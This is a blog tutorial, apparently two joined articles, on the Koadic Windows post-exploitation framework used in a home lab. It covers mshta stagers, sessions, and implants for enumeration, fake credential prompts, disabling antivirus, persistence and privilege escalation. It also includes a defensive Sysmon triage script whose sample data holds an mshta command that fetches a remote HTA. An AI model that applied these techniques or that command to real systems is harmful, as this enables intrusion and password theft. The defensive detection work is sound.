Hello, aspiring ethical hackers. In our previous blog post, you learnt about Windows post-exploitation. In this article, you will learn about Koadic, a Windows post-exploitation rootkit.
Koadic is similar to other pentesting tools like Empire and Meterpreter in function, but it performs most of its operations using Windows Script Host (e.g. JScript/VBScript).
It also has the capability to serve payloads in memory and to communicate over encrypted SSL/TLS channels.
Let's see how this tool works. For this we will be using Kali Linux as the attacker machine. Koadic is available by default in its repositories.
As the target system we will be using Windows 10 as part of the virtual hacking lab (just exchange Windows 10 for Metasploitable 2).
Koadic can be started with the command shown below.
Here's how the Koadic interface looks.
There are three important concepts you need to understand about Koadic: stagers, Zombies and implants.
Stagers are the method through which you gain access to the target systems. You can view all the stagers of Koadic using the command use stager <tab> <tab>.
For example, let's select the mshta stager. This stager uses an HTA (HTML Application) to gain initial access. To view information about this stager, you can use the info command.
All the options are set automatically (including the attacker's IP). If you want to change any option, you can do so using the "set" command (set SRVHOST <attacker IP>, etc.). After setting all the options, you can execute the module using the "run" command.
It creates a URL embedded in a command. This command needs to be executed on the target system.
Since it is a URL, don't make the mistake of opening it in a browser as shown.
You will get a Zombie, but it will time out soon as shown below.
Open a command prompt (remember, you are in the post-exploitation stage) and execute the command as shown below.
You will get a LIVE Zombie as shown below.
It's time to define a Zombie in Koadic now. Zombies in Koadic are like shells or sessions (similar to Meterpreter sessions in Metasploit). You can view all the Zombies you have using the "zombies" command.
You can interact with a specific Zombie using the command shown below.
Next come implants. Implants in Koadic is the name for all the post-exploitation operations you can perform using a Zombie. You can view all the implants just like you viewed the stagers.
They are divided into sections based on the purpose they fulfill.
For example, let's see all the gather modules. They help in gathering information on the target system.
Let's see the "enum_users" implant.
All you have to do to use the implant is to set the ID of the Zombie and execute it.
As you can see, there is only one user on the target system. His name is ADMIN.
The "manage" implants help us to enable remote desktop, kill AV or execute a command on the target system.
Let’s use the exec_cmd implant.
By default, it is set to execute the command “hostname” on the target system and display its result.
The "phish" implants do what their name says: they phish the target users.
Let's use it to capture a password.
When executed, it pops up a window on the target system asking for the user's password.
If the target user falls for it, the password is captured. This implant can be used to get any password, with a bit of social engineering of course.
The "fun" section has implants related to things like voice, thunderstruck etc.
The "inject" implants inject code into other processes.
Similarly, the "util" implants are useful in uploading and downloading files to and from the target system.
Koadic has implants that are used to establish persistence.
There are even implants that help in privilege escalation.
Remember, we have a low-privileged Zombie. Let's use the fodhelper implant to get a Zombie with elevated privileges on the target system.
Set the PAYLOAD to '0' and the Zombie ID.
After all the options are set, execute the implant.
Let's check the result.
As you can see, we now have an elevated session. That's all about Koadic.
Hello aspiring ethical hackers. In this article you will learn about a Windows post-exploitation tool named Koadic. Koadic, or COM Command and Control, is a rootkit tool used for Windows post-exploitation. It is similar to Meterpreter and PowerShell Empire, except that it performs most of its operations using Windows Script Host, i.e. JScript and Visual Basic Script.
The good thing about Koadic is that it is compatible with almost all versions of Windows, from Windows 2000 to Windows 10. It also has the ability to serve payloads in memory and has been updated to run with the newly released Python 3. Koadic can be cloned from GitHub as shown below.
Once the repository is cloned, we can navigate into that directory and install the requirements needed for using Koadic.
Once the requirements are all installed, Koadic can be started using the command shown below.
./koadic
Koadic has two important components. They are,
- Stagers
- Implants.
Stagers are used to get initial sessions, which are called Zombies. Once Koadic is started, we can have a look at the various stagers of Koadic using the command shown below.
use stager <tab> <tab>
Let's use the JavaScript mshta stager. This stager serves payloads in memory using MSHTA.exe HTML Applications.
Set the SRVHOST, SRVPORT and ENDPOINT (the name of the stager we create) options and execute the stager using the run command.
As you can see in the above image, the payload is ready. Once the victim visits this link, the virus_scanner.hta payload starts downloading on the target machine. Once the victim executes it, we get a Zombie on the attacker machine as shown in the image below. A Zombie in Koadic is just like a session in Metasploit.
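Both the walkthrough above (the mshta stager whose command has to be run on the target) and this Part 1 section describe the same trait: mshta.exe is started with a URL pointing at the Koadic server. As an added defender-side example that is not Koadic's own code, the Python below triages constructed Sysmon-style process-creation records for that pattern; the field names follow Sysmon Event ID 1, and the IP, port and paths are constructed sample values.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events (Sysmon Event ID 1 fields, simplified).
# 192.0.2.10 is a documentation address, not real infrastructure.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://192.0.2.10:9999/virus_scanner.hta",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Remote content: an http(s) URL or a UNC path on the command line.
REMOTE_RE = re.compile(r"https?://|\\\\[^\\\s]+\\", re.IGNORECASE)
# Parents that indicate the HTA host was launched from a shell rather than by a user double-click.
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Tuple[str, str]:
    """Return (severity, reason) for one process-creation event."""
    if _basename(event.get("Image", "")) != "mshta.exe":
        return ("benign", "not mshta.exe")
    cmd = event.get("CommandLine", "")
    parent = _basename(event.get("ParentImage", ""))
    if REMOTE_RE.search(cmd):
        # This is the Koadic stager shape: mshta fetching an HTA from a remote server.
        return ("high", "mshta.exe loading remote HTA content")
    if parent in SHELL_PARENTS:
        return ("medium", f"mshta.exe spawned by {parent}")
    return ("low", "local HTA launched by mshta.exe; review the file")


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Keep every non-benign event as (severity, reason, command line), highest first."""
    order = {"high": 0, "medium": 1, "low": 2}
    hits = [(*classify(e), e.get("CommandLine", "")) for e in events]
    return sorted((h for h in hits if h[0] != "benign"), key=lambda h: order[h[0]])
```

Feeding real Sysmon or Security 4688 records through classify() only requires mapping their command-line and parent fields onto the same three keys.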
The “zombies” command can be used to view all the sessions we have.
Every zombie session is given a session id starting from 0 which can be used for interacting with it. For example, the zombie session I got has been assigned ID “0”. Let’s interact with it.
Readers will learn more about this tool in Part 2 of this article.